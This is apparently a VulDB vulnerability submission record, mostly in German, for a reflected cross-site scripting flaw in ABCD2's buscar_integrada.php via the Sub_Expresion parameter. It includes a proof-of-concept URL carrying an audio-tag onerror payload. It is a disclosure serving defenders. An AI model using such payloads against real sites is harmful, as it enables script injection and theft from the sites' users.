| Titel | ABCD Community ABCD2 2.x Cross Site Scripting |
|---|
| Beschreibung | There is a Cross Site Scripting (XSS) vulnerability in buscar_integrada.php file, using the parameter Sub_Expresion.
Example: https://XXXXX/opac/php/buscar_integrada.php?lang=pt&base=acervo&modo=1B&alcance=and&Opcion=libre&prefijo=TW_&Sub_Expresion=MG_00056fas%3Caudio%20src/onerror=alert(1)%3E |
|---|
| Quelle | ⚠️ https://github.com/peritocibernetico/ABCD_Vulnerabilities |
|---|
| Benutzer | peritocibernetico (UID 74140) |
|---|
| Einreichung | 27.08.2024 20:52 (vor 2 Jahren) |
|---|
| Moderieren | 04.09.2024 10:39 (8 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 276491 [ABCD ABCD2 bis 2.2.0-beta-1 /buscar_integrada.php Sub_Expresion Cross Site Scripting] |
|---|
| Punkte | 18 |
|---|